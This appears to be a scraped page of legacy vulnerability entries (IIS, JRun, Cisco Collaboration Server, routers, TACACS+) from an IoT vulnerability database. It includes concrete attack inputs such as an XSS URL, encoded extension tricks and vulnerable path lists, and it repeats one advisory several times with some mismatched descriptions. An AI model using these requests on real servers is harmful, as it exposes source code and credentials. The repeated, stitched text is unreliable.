VARIoT IoT vulnerabilities database

IIS 5.0 allows remote attackers to obtain source code for .ASP files and other scripts via an HTTP GET request with a "Translate: f" header, aka the "Specialized Header" vulnerability. Microsoft IIS Is "Translate: f" Header added HTTP GET When a request is received, a flaw exists that locates the correct file but does not recognize it as a file that needs to be processed by the script engine and sends that file to the browser..ASP And .ASA And .HTR You may be able to view source files that have a normal extension that cannot be viewed. Many webservers are case-sensitive, but do not have all possible combinations of cases in mapped extensions mapped properly. By changing the letters in a JSP or a JHTML file extension from lower case to upper case (eg: .jsp or .jhtml becomes .JSP or .JHTML) in a URL the server does not recognize the file extension and sends the file normally. In that manner, a user is able to access the source code to those specific files. Microsoft IIS 5.0 has a dedicated scripting engine for advanced file types such as ASP, ASA, HTR, etc. files. The scripting engines handle requests for these file types, processes them accordingly, and then executes them on the server. # Title: Cisco Collaboration Server 5 XSS, Source Code Disclosure # Author: s4squatch # Published: 2010-02-11 Cisco Collaboration Server 5 XSS, Source Code Disclosure Discovered by: s4squatch of SecureState R&D Team (www.securestate.com Discovered: 08/26/2008 Note: End of Engineering --> http://www.cisco.com/en/US/products/sw/custcosw/ps747/prod_eol_notice09186a008032d4d0.html Replaced with: http://www.cisco.com/en/US/products/ps7233/index.html and http://www.cisco.com/en/US/products/ps7236/index.html XSS === http://www.website.com/webline/html/admin/wcs/LoginPage.jhtml?oper=&dest="> Java Servlet Source Code Disclosure =================================== The source code of .jhtml files is revealed to the end user by requesting any of the following: Normal File: file.html Modified 1: file%2Ejhtml Modified 2: file.jhtm%6C Modified 3: file.jhtml%00 Modified 4: file.jhtml%c0%80 Cisco Collaboration Server 5 Paths It Works On (list may not be complete) ========================================================================= http://www.website.com/doc/docindex.jhtml http://www.website.com/browserId/wizardForm.jhtml http://www.website.com/webline/html/forms/callback.jhtml http://www.website.com/webline/html/forms/callbackICM.jhtml http://www.website.com/webline/html/agent/AgentFrame.jhtml http://www.website.com/webline/html/agent/default/badlogin.jhtml http://www.website.com/callme/callForm.jhtml http://www.website.com/webline/html/multichatui/nowDefunctWindow.jhtml http://www.website.com/browserId/wizard.jhtml http://www.website.com/admin/CiscoAdmin.jhtml http://www.website.com/msccallme/mscCallForm.jhtml http://www.website.com/webline/html/admin/wcs/LoginPage.jhtml Related Public Info =================== http://www.securityfocus.com/bid/3592/info http://www.securityfocus.com/bid/1578/info http://www.securityfocus.com/bid/1328/info Scott White<mailto:swhite@securestate.com> | Senior Consultant | SecureState 623.321.2660 - office | 480.440.7595 - mobile | 216.927.2801 - fax [cid:image001.png@01CAAB16.BDE852B0]<https://www.securestate.com/>

Unify eWave ServletExec allows a remote attacker to view source code of a JSP program by requesting a URL which provides the JSP extension in upper case. Many webservers are case-sensitive, but do not have all possible combinations of cases in mapped extensions mapped properly. In that manner, a user is able to access the source code to those specific files. Microsoft IIS 5.0 has a dedicated scripting engine for advanced file types such as ASP, ASA, HTR, etc. files. The scripting engines handle requests for these file types, processes them accordingly, and then executes them on the server. It is possible to force the server to send back the source of known scriptable files to the client if the HTTP GET request contains a specialized header with 'Translate: f' at the end of it, and if a trailing slash '/' is appended to the end of the URL. The scripting engine will be able to locate the requested file, however, it will not recognize it as a file that needs to be processed and will proceed to send the file source to the client. # Title: Cisco Collaboration Server 5 XSS, Source Code Disclosure # Author: s4squatch # Published: 2010-02-11 Cisco Collaboration Server 5 XSS, Source Code Disclosure Discovered by: s4squatch of SecureState R&D Team (www.securestate.com Discovered: 08/26/2008 Note: End of Engineering --> http://www.cisco.com/en/US/products/sw/custcosw/ps747/prod_eol_notice09186a008032d4d0.html Replaced with: http://www.cisco.com/en/US/products/ps7233/index.html and http://www.cisco.com/en/US/products/ps7236/index.html XSS === http://www.website.com/webline/html/admin/wcs/LoginPage.jhtml?oper=&dest="> Java Servlet Source Code Disclosure =================================== The source code of .jhtml files is revealed to the end user by requesting any of the following: Normal File: file.html Modified 1: file%2Ejhtml Modified 2: file.jhtm%6C Modified 3: file.jhtml%00 Modified 4: file.jhtml%c0%80 Cisco Collaboration Server 5 Paths It Works On (list may not be complete) ========================================================================= http://www.website.com/doc/docindex.jhtml http://www.website.com/browserId/wizardForm.jhtml http://www.website.com/webline/html/forms/callback.jhtml http://www.website.com/webline/html/forms/callbackICM.jhtml http://www.website.com/webline/html/agent/AgentFrame.jhtml http://www.website.com/webline/html/agent/default/badlogin.jhtml http://www.website.com/callme/callForm.jhtml http://www.website.com/webline/html/multichatui/nowDefunctWindow.jhtml http://www.website.com/browserId/wizard.jhtml http://www.website.com/admin/CiscoAdmin.jhtml http://www.website.com/msccallme/mscCallForm.jhtml http://www.website.com/webline/html/admin/wcs/LoginPage.jhtml Related Public Info =================== http://www.securityfocus.com/bid/3592/info http://www.securityfocus.com/bid/1578/info http://www.securityfocus.com/bid/1328/info Scott White<mailto:swhite@securestate.com> | Senior Consultant | SecureState 623.321.2660 - office | 480.440.7595 - mobile | 216.927.2801 - fax [cid:image001.png@01CAAB16.BDE852B0]<https://www.securestate.com/>

Allaire JRun 2.3.3, 3.0 and 3.1 running on IIS 4.0 and 5.0, iPlanet, Apache, JRun web server (JWS), and possibly other web servers allows remote attackers to read arbitrary files and directories by appending (1) "%3f.jsp", (2) "?.jsp" or (3) "?" to the requested URL. Many webservers are case-sensitive, but do not have all possible combinations of cases in mapped extensions mapped properly. By changing the letters in a JSP or a JHTML file extension from lower case to upper case (eg: .jsp or .jhtml becomes .JSP or .JHTML) in a URL the server does not recognize the file extension and sends the file normally. In that manner, a user is able to access the source code to those specific files. Microsoft IIS 5.0 has a dedicated scripting engine for advanced file types such as ASP, ASA, HTR, etc. files. The scripting engines handle requests for these file types, processes them accordingly, and then executes them on the server. It is possible to force the server to send back the source of known scriptable files to the client if the HTTP GET request contains a specialized header with 'Translate: f' at the end of it, and if a trailing slash '/' is appended to the end of the URL. The scripting engine will be able to locate the requested file, however, it will not recognize it as a file that needs to be processed and will proceed to send the file source to the client. Allaire JRun is a development suite with JSP and Java Servlets for developing web applications. Allaire JRun is prone to an information-disclosure vulnerability because it fails to handle malformed URLs properly. A remote attacker could access the contents under the webserver root directory. Submitting a request for 'http://server/%3f.jsp' could cause JRun to reveal the contents within the web root. It's also possible to view the contents of any subdirectories along with ACL-protected resources. The attacker could exploit this issue to obtain the source of known files residing on the host, including ASP files. NOTE: This vulnerability was originally reported to work on Microsoft IIS hosts only, but other webservers (Apache, Jetty) have been reported vulnerable. # Title: Cisco Collaboration Server 5 XSS, Source Code Disclosure # Author: s4squatch # Published: 2010-02-11 Cisco Collaboration Server 5 XSS, Source Code Disclosure Discovered by: s4squatch of SecureState R&D Team (www.securestate.com Discovered: 08/26/2008 Note: End of Engineering --> http://www.cisco.com/en/US/products/sw/custcosw/ps747/prod_eol_notice09186a008032d4d0.html Replaced with: http://www.cisco.com/en/US/products/ps7233/index.html and http://www.cisco.com/en/US/products/ps7236/index.html XSS === http://www.website.com/webline/html/admin/wcs/LoginPage.jhtml?oper=&dest="> Java Servlet Source Code Disclosure =================================== The source code of .jhtml files is revealed to the end user by requesting any of the following: Normal File: file.html Modified 1: file%2Ejhtml Modified 2: file.jhtm%6C Modified 3: file.jhtml%00 Modified 4: file.jhtml%c0%80 Cisco Collaboration Server 5 Paths It Works On (list may not be complete) ========================================================================= http://www.website.com/doc/docindex.jhtml http://www.website.com/browserId/wizardForm.jhtml http://www.website.com/webline/html/forms/callback.jhtml http://www.website.com/webline/html/forms/callbackICM.jhtml http://www.website.com/webline/html/agent/AgentFrame.jhtml http://www.website.com/webline/html/agent/default/badlogin.jhtml http://www.website.com/callme/callForm.jhtml http://www.website.com/webline/html/multichatui/nowDefunctWindow.jhtml http://www.website.com/browserId/wizard.jhtml http://www.website.com/admin/CiscoAdmin.jhtml http://www.website.com/msccallme/mscCallForm.jhtml http://www.website.com/webline/html/admin/wcs/LoginPage.jhtml Related Public Info =================== http://www.securityfocus.com/bid/3592/info http://www.securityfocus.com/bid/1578/info http://www.securityfocus.com/bid/1328/info Scott White<mailto:swhite@securestate.com> | Senior Consultant | SecureState 623.321.2660 - office | 480.440.7595 - mobile | 216.927.2801 - fax [cid:image001.png@01CAAB16.BDE852B0]<https://www.securestate.com/>

Allegro's RomPager is an embedded WEB service product, which is more used to provide WWW management capabilities for network printers, switches and other network devices. If you submit a specially designed exception request, it may crash, often causing problems with the managed device, and the network device or even the entire network is unavailable at this time. All a remote attacker needs is a browser. Versions other than 2.10 may also be affected by this attack. The following is a list of some manufacturers' products known to use Allegro RomPager: 3Com: TotalSwitch LAN switching hubs LANLinker Dual Analog Router Acacia Networks: NovaSwitch Ethernet switches. APC: UPS products with web management Andover Controls Corporation: Infinity automated building controls Bizfon: Bizfon 680 Multifunction communications server D-Link Systems: DES-3225G 24-port 10 / 100Mbps Ethernet switch. DES-3224 + EdgePoint Networks: EdgeStar EdgeStackEdgeSwitch Extreme Networks: Summit Gigabit Switch Foundry Networks: BigIron Switching Routers, FastIron SwitchesNetIron Core Routers. (possibly entire product line ) Interspeed: System 1000 and 500 Central Office ADSL routers LANart Corporation: Segway Adaptive Microsegmentable Ethernet Hub Netopia Communications: Netopia ISDN router products NETsilicon, Inc .: NET + ARM product family Net To Net Technologies: IP DSL Access Multiplexer 12000 Network Peripherals: NuSwitch Ethernet switches and hubs Northern Telecom: Accelar Gigabit Ethernet Osicom: NETPrint 1000 print server various Ethernet switch products Proxim: RangeLAN2 QMS: various networked printers Xerox: DocuPrint laser printers

Check Point Firewall-1 allows remote attackers to cause a denial of service by sending a large number of malformed fragmented IP packets. A large stream of IP traffic can monopolize the CPU of a Check Point FireWall-1 firewall, resulting in a denial-of-service condition. A large stream of IP traffic can monopolize the CPU of a Check Point FireWall-1 firewall, resulting in a denial-of-service condition. The FireWall-1 rulebase cannot prevent this attack and it is not logged in the firewall logs. Check Point Firewall-1 is vulnerable

When configured to store configuration information in an LDAP directory, Shiva Access Manager 5.0.0 stores the root DN (Distinguished Name) name and password in cleartext in a file that is world readable, which allows local users to compromise the LDAP server. The Shiva Access Manager is a solution for centralized remote access authentication, authorization, and accounting offered by Intel. It runs on Solaris and Windows NT. Shiva Access Manager is vulnerable to a default configuration problem in its Solaris version (and possibly for NT as well, though uncomfirmed). It stores this information in a textfile that is owned by root and set world readable by default, $SHIVA_HOME_DIR/insnmgmt/shiva_access_manager/radtac.ini. This file also contains information such as the LDAP server's hostname and server port. This information can be used to completely compromise the LDAP server

ITHouse mail server 1.04 has a remote overflow vulnerability. The attacker will construct a special email. The "recipient" field of the email contains more than 2270 bytes of data, which will cause the ITHouse mail server to overflow and may execute arbitrary code. & lt; * Source: Delphis Consulting Plc Security Team Advisories [30/05/2000] securityteam@delphisplc.com http://www.delphisplc.com/thinking/whitepapers/ *>

A system does not present an appropriate legal message or warning to a user who is accessing it. kernel is prone to a remote security vulnerability. Attackers can exploit this issue to perform unauthorized actions. This may aid in further attacks

Buffer overflow in Cisco TACACS+ tac_plus server allows remote attackers to cause a denial of service via a malformed packet with a long length field. A small buffer overrun exists in the free, unsupported implementation of the tacacs+ server, distributed by Cisco. This vulnerability, while a buffer overrun, appears to not be exploitable due to its short nature. While the analysis of the tacacs+ protocol posted to Bugtraq indicated that clients, including IOS, were vulnerable to the above problems, Cisco claims that IOS clients will reject the packets as invalid, and report an error, without any further problems. Attacking the client requires the ability to perform blind TCP sequencing, and as such is difficult to conduct. The first vulnerability, a buffer overflow, is due to the nature in which the tac_plus server allocates memory for the incoming packet. It will read only up to the length of the header in a primary read, allocate the amount of memory indicated in the header, copy the header into the allocated memory, and then read and copy the remaining buffer in. The buffer overrun is caused by it failing to check for an integer overflow in the length field of the header when added to the header length. This can result in an 11 byte overflow. The second vulnerability is due to a lack of sanity checking on the length field. An arbitrarily large number can be sent for the body length. The server or client will malloc whatever the length presented is, and as such may allocate an excessive amount of memory, resulting in the denial of service previously mentioned

A number of vulnerabilities exist in the TACACS+ protocol. These are part of the protocol, and as such do not affect only those products listed as being vulnerable, but any implementation of TACACS+, both on the client and on the server side. 1) Integrity Checking TACACS+ does not use any form of integrity checking to ensure a TACACS+ packet has not been tampered with. Due to the nature of its encryption mechanism, an attacker could potentially alter a packet by flipping bits. One example cited is the possibility of an attacker flipping a single bit to alter an accounting packet, changing the elapsed_time being reported from 9000 to 1000. 2) Vulnerability to Replay TACACS+ has no protection against replay attacks. So long as a packet has the correct TACACS+ sequence number, it will be accepted. As TACACS+ sequence numbers start at 1, the server will always process packets with the sequence number of 1. The description of this vulnerability noted that this is most easily used against accounting packets, as they are single packet transactions. 3) Session ID collision The encryption mechanism for TACACS+ depends heavily on a unique session_id for each session. If multiple sessions get the same session_id and seq_no, it can become vulnerable to a frequency analysis attack. In addition, if plaintext is known in one packet, it is trivial to decrypt the corresponding portion of the other packet containing the same sequence and session id. It is possible to get a TACACS+ server to encrypt a reply packet using a chosen session_id. This makes it possible to compromise the encryption of packets from the server to client. 4) Session ID randomness Due to the length of the session_id, and an inability to prevent id collision across reboots and multiple servers, session id's will eventually be reused, which can result in the decryption of packets. For an ISP handling 20,000 dialup sessions a day, there could be over 100,000 session_id collisions in a year. 5) Lack of padding A lack of padding of fields in the protocol can reveal the length of these unpadded fields. This could result in revealing the length of a user password. 6) MD5 context leak A theoretical vulnerability exists whereby part of a packet may be decrypted, due to the presence of certain bytes. These attacks all require the attacker be present on the network where these transaction are taking place; in some cases, the attack may need to be on a machine or router seperating the client from the server. As such, while very real vulnerabilities, using them in a real world situation may be difficult.

The listening port of the Network Associates WebShield SMTP 4.5.44 remote management service is 9999. When connected to this port, you can get the current configuration by executing the following command: GET_CONFIG & lt; CR> When accepting a string of more than 208 bytes to When parameters are configured, a stack overflow occurs. This service usually crashes. If the string contains executable code, an attacker may execute arbitrary commands as system. & lt; * Source: Delphis Consulting Plc Security Team Advisories securityteam@delphisplc.com *>

The Cayman 3220-H DSL router allows remote attackers to cause a denial of service via oversized ICMP echo (ping) requests. Reported effects vary; sometimes it stops telnet and http admin services, other times the router may restart without routing but the admin services stay up. The Cayman 3220H DSL router is vulnerable

Top Layer AppSwitch 2500 allows remote attackers to cause a denial of service via malformed ICMP packets. TopLayer AppSwitch 2500 has been reported to be vulnerable to numerous DoS attacks. Fragmented packets, bad ICMP checksums, and other anomalous packets are reported to crash the switch. Vulnerabilities exist in Top Layer AppSwitch version 2500

Windows 95, Windows 98, Windows 2000, Windows NT 4.0, and Terminal Server systems allow a remote attacker to cause a denial of service by sending a large number of identical fragmented IP packets, aka jolt2 or the "IP Fragment Reassembly" vulnerability. CPU utilization will return to normal after the attack has ceased. In some cases, this attack could produce a blue screen of death. An analysis of the exploit was posted to BugTraq on May 26, 2000 by Mikael Olsson <mikael.olsson@enternet.se>. He concludes that the DoS initated by this attack may not be related to IP fragmentation but rather to resource exhaustion and a problem in filtering bad packets by Microsoft Windows. See the message references by Mikael Olsson for a further interpretation of the mechanism of this attack

Buffer overflow in the CyberPatrol daemon "cyberdaemon" used in gauntlet and WebShield allows remote attackers to cause a denial of service or execute arbitrary commands. A buffer overflow exists in the version of Mattel's Cyber Patrol software integrated in to Network Associates Gauntlet firewall, versions 4.1, 4.2, 5.0 and 5.5. Due to the manner in which Cyber Patrol was integrated, a vulnerability was introduced which could allow a remote attacker to gain root access on the firewall, or execute arbitrary commands on the firewall. By default, Cyber Patrol is installed on Gauntlet installations, and runs for 30 days. After that period, it is disabled. During this 30 day period, the firewall is susceptible to attack,. Due to the filtering software being externally accessible, users not on the internal network may also be able to exploit the vulnerability. Some versions of SGI IRIX shipped with the Gauntlet Firewall package, and in the past it was a supported SGI product. While it is no longer being supported, SGI IRIX versions 6.5.2, 6.5.3, 6.5.4 and 6.5.5 may be prone to this issue

The HTTP administration interface to the Cayman 3220-H DSL router allows remote attackers to cause a denial of service via a long username or password. Router log will show "restart not in response to admin command". Cayman 3220-H DS has a vulnerability in the HTTP management interface

The Netopia R9100 router does not prevent authenticated users from modifying SNMP tables, even if the administrator has configured it to do so. The router has a command-line mode that is reached by typing control-N after the user has passed the intial login test. At the "#" prompt one can then do most management of the device. This includes the setting of SNMP community strings in spite of the limitation imposed by the administrator. The following devices are confirmed as vulnerable: R2020 Dual Analog Router R3100 ISDN Router R3100-I ISDL Router R3100-T IDSL router for Covad R3232-I IDSL 4-IMUX router R5100 Serial router R5200 DDS router R5220 DDS router w/ V.90 backup R5300 T1 router R5320 T1 router w/ V.90 backup R5331 T1 router w/ ISDN backup R7100-C SDSL router R7120 SDSL Router w/int V.90 R7131 SDSL router w/int ISDN R7171 SDSL 2x IMUX router R7200-T SDSL router for Covad R7220 SDSL router w/int.V.90 R7231 SDSL router w/int ISDN R9100 Ethernet-to-ethernet Router

IIS 4.0 and 5.0 allows remote attackers to obtain fragments of source code by appending a +.htr to the URL, a variant of the "File Fragment Reading via .HTR" vulnerability. A vulnerability exists in Microsoft Internet Information Server (IIS) that could disclose sensitive information contained in CGI-type files. Typically a CGI/script file on a web server should only be executable and not readable to remote users. Sensitive information contained in CGI-type files file might include user credentials for access to a back-end database.This is a variation of the vulnerability previously discussed in VU#35085 and Microsoft Security Bulletin MS00-031. Requesting a known filename with the extension replaced with .htr preceeded by approximately 230 "%20" (which is an escaped character that represents a space) from Microsoft IIS 4.0/5.0 will cause the server to retrieve the file and its contents. This is due to the .htr file extension being mapped to ISM.DLL ISAPI application which redirects .htr file requests to ISM.DLL. ISM.DLL removes the extraneous "%20" and replaces .htr with the proper filename extension and reveals the source of the file. This vulnerability is similar to a more recently discovered variant, BugTraq ID 1488. This action can only be performed if a .htr request has not been previously made or if ISM.DLL is loaded into memory for the first time. If an .htr request has already been made, a restart of the web server is necessary in order to perform another. Microsoft IIS 4.0 and 5.0 can be made to disclose fragments of source code which should otherwise be inaccessible. This is done by appending "+.htr" to a request for a known .asp (or .asa, .ini, etc) file. Appending this string causes the request to be handled by ISM.DLL, which then strips the +.htr string and may disclose part or all of the source of the .asp file specified in the request. There has been a report that source will be displayed up to the first '<%' encountered - '<%' and '%>' are server-side script delimiters. Pages which use the <script runat=server></script> delimiters instead will display the entire source, or up to any '<%' in the page

IIS 4.05 and 5.0 allow remote attackers to cause a denial of service via a long, complex URL that appears to contain a large number of file extensions, aka the "Malformed Extension Data in URL" vulnerability. Restarting the application or waiting until the URL is processed will be required in order to regain normal functionality

ISM.DLL in IIS 4.0 and 5.0 allows remote attackers to read file contents by requesting the file and appending a large number of encoded spaces (%20) and terminated with a .htr extension, aka the ".HTR File Fragment Reading" or "File Fragment Reading via .HTR" vulnerability. A vulnerability exists in Microsoft Internet Information Server (IIS) that could disclose sensitive information contained in CGI-type files. Typically a CGI/script file on a web server should only be executable and not readable to remote users. Sensitive information contained in CGI-type files file might include user credentials for access to a back-end database.This is a variation of the vulnerability previously discussed in VU#35085 and Microsoft Security Bulletin MS00-031. Microsoft IIS Is (1) If you receive a password change request that does not specify a delimiter that should be specified, (2) If a known file extension is changed to a specific character string, there is a flaw that causes an infinite search, resulting in a significant decrease in processing power.Microsoft IIS Service disruption (DoS) It may be in a state. Requesting a known filename with the extension replaced with .htr preceeded by approximately 230 "%20" (which is an escaped character that represents a space) from Microsoft IIS 4.0/5.0 will cause the server to retrieve the file and its contents. This is due to the .htr file extension being mapped to ISM.DLL ISAPI application which redirects .htr file requests to ISM.DLL. ISM.DLL removes the extraneous "%20" and replaces .htr with the proper filename extension and reveals the source of the file. This vulnerability is similar to a more recently discovered variant, BugTraq ID 1488. This action can only be performed if a .htr request has not been previously made or if ISM.DLL is loaded into memory for the first time. If an .htr request has already been made, a restart of the web server is necessary in order to perform another. Microsoft IIS 4.0 and 5.0 can be made to disclose fragments of source code which should otherwise be inaccessible. This is done by appending "+.htr" to a request for a known .asp (or .asa, .ini, etc) file. Appending this string causes the request to be handled by ISM.DLL, which then strips the +.htr string and may disclose part or all of the source of the .asp file specified in the request. There has been a report that source will be displayed up to the first '<%' encountered - '<%' and '%>' are server-side script delimiters. Pages which use the <script runat=server></script> delimiters instead will display the entire source, or up to any '<%' in the page